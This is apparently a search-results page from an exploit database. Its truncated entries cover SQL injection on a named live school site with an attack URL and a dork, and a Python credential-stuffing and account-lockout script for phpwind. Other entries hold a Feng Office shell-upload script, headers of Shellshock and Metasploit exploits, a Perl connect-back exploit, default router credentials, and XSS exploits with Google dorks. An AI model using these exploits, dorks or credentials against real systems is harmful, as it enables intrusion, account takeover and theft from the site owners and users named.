3100 matches found
Belkin Router Information Disclosure
Remote information disclosure Vulnerability Type: File Disclosure For the exploit source code contact DSquare Security sales team...
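SQL Injection in a Widely Deployed School Administration System (Part 2)
Brief description: boom!!! Details: Vendor: 南京苏亚星资讯科技开发有限公司. The vulnerability is located at /SM2005/jiaoshi/InfoSet/Left.asp?id= and the id parameter is not filtered, which leads to injection. Visiting http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/ directly produces an authorization error, and the page source can be used to assemble the injection link. Baidu keyword: /SM2005 Five cases listed to demonstrate that the issue is generic: http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0 Place: GET Parameter: id Type: stacked...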
Mouse Media Script 1.6 0 - Stored XSS Vulnerability
No description provided by source. Exploit Title: Mouse Media Script Stored XSS Vulnerability Google Dork: "is your best source of fun." inurl:/view/popular Date: 04-10-2014 Exploit Author: Halil Dalabasmaz Version: v1.6 Software Link: http://codecanyon.net/item/mouse-media-script/7773254 Softwar...
Feng Office 1.7.4 - Arbitrary File Upload
No description provided by source...
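phpwind Login Allows Credential Stuffing and Locking Other Users' Accounts
Brief description: The Phpwind login allows credential stuffing (official demo site) and locking other users' accounts; accounts can be locked continuously in bulk, isn't that great; untested..... It can be bypassed even with CAPTCHA enabled. Details: This was black-box testing, so I'll go straight to how to use it. 1. First we extract the usernames of all accounts. The code is as follows def getuid: con=urllib2.urlopen"http://www.phpwind.net/index.php?m=space&uid="+struid.read r=re.compile'\S+的个人空间' return r.findallcon 2. Next, build an interface to a social-engineering database that retrieves the password for a username. def getpassname:...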
ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Persistent Cross-Site Scripting
Exploit Title: ZTE Modem Stored XSS Vulnerability Date: 30-10-2014 Exploit Author: Ravi Rajput aka Gr3y n00b IHT team Version: ZXDSL 531BIIV7.3.0fD09IN Software Link:http://wwwen.zte.com.cn Tested on : Windows 7 code : GET...
Feng Office 1.7.4 - XSS / Arbitrary File Upload Exploit
Exploit for php platform in category web applications Source: http://www.securityfocus.com/bid/47049/info alert0" / alert0" / --------------------------------------------- Feng Office 1.7.4 - Arbitrary File Upload --------------------------------------------- import socket host = 'localhost' path...
Feng Office 1.7.4 - Arbitrary File Upload
import socket host = 'localhost' path = '/fengcommunity' shellpath = '/tmp' port = 80 def uploadshell: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, port s.settimeout8 s.send'POST ' + path + '/public/assets/javascript/ckeditor/ckuploadhandler.php HTTP/1.1\r\n' 'Host:...
Cross-Site Request Forgery (CSRF) in xEpan
High-Tech Bridge Security Research Lab discovered a vulnerability in xEpan, which can be exploited to compromise a vulnerable web site. 1) Cross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429 The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user...
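HTTP Host Header Attack Vulnerability in Multiple Discuz! Versions
Brief description: Why has nobody submitted this kind of vulnerability? Then let me go first! Details: http://drops.wooyun.org/papers/1383 First, a tribute to James Kettle. Below, Discuz! X3.2 is used as an example for a demonstration. Proof of vulnerability: Taking http://bbs.locojoy.com/ as an example, 1. Its IP is easily found to be 115.29.162.113 2. Add the entry 115.29.162.113 www.evil.com to hosts 3. Visit http://www.evil.com, choose password recovery, enter the target's email, and submit 4. The victim receives the email...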
DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities
DrayTek VigorACS SI versions 1.3.0 and below suffer from local file inclusion, remote file upload, file write, and default login vulnerabilities. DrayTek VigorACS SI /ACSServer/ We found that most of the VigorACS SI deployments are using the default http authentication settings acs/password. This...
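YXcms: Unauthorized Modification of Any User's Profile and Retrieval of Any User's Password
Brief description: When a user's profile is modified, the YXcms site-building system does not verify the user's identity, which allows unauthorized operations. Details: 1. Affected version: YXcms1.2.6 2. Download: http://www.yxcms.net/ System demo: http://demo.yxcms.net/index.html 3. When a user completes their profile, the system performs the operation on the back end based on the user id. However, the user id is just a simple number, so by modifying the id we can modify any user's profile information. Proof of vulnerability: 1. Log in to the system, go to the member center, and in the profile completion module fill in the basic profile data to be changed. 2. To demonstrate the vulnerability, we registered a victim account with id 1, then intercepted the request and changed the id to the victim's id, i.e. 1....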
Apache mod_cgi Remote Command Execution
! /usr/bin/env python from socket import from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage: print """ Shellshock apache modcgi remote exploit Usage: ./exploit.py var= Vars: rhost: victim host rport: victim port for TCP shell...
EMC AlphaStor Device Manager Opcode 0x75 Command Injection
No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initializeinfo = superupdateinfoinfo, 'Name' = 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',...
Gnu Bash 4.3 CGI REFERER Command Injection
!/usr/bin/perl Title: Bash/cgi command execution exploit CVE: CVE-2014-6271 Author: Simo Ben youssef Contact: SimoatMorxploitcom Coded: 25 September 2014 Published: 26 September 2014 MorXploit Research http://www.MorXploit.com Description: Perl code to exploit CVE-2014-6271. Injects a Perl connec...
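EduSoho Online Classroom Product: Arbitrary Deletion (Part 2)
Brief description: The vendor's attitude is very good and the fix came really fast. They gave me a test site to help with testing. So here I am again. Details: Let's look at where posts are made in groups. http://t5.edusoho.cn/group/2/thread/7?page=1post-85 Post any reply. Then there is a small problem in the delete function. Capture the request and take a look. As above.. the POST url contains the comment ID and the member ID, and both parameters can be obtained from the thread. Modify as follows, send the data, then go back and check the result. It's gone.. Proof of vulnerability: Let's look at where posts are made in groups. http://t5.edusoho.cn/group/2/thread/7?page=1post-85 Post any reply....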
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution
No description provided by source...
CacheGuard-OS 5.7.7 - CSRF Vulnerability
No description provided by source. I. VULNERABILITY ------------------------- CSRF vulnerabilities in CacheGuard-OS v5.7.7 II. BACKGROUND ------------------------- CacheGuard is an All-in-One Web Security Gateway providing firewall, web antivirus, caching, compression, URL filtering, proxy, high...
CVE-2014-6436
creationtimestamp | type | source
---|---|---
2014-09-15 00:00:00+00:00 | exploited | https://www.exploit-db.com/exploits/39316...
JCMS /opr_domsg.jsp SQL Injection Vulnerability
No description provided by source...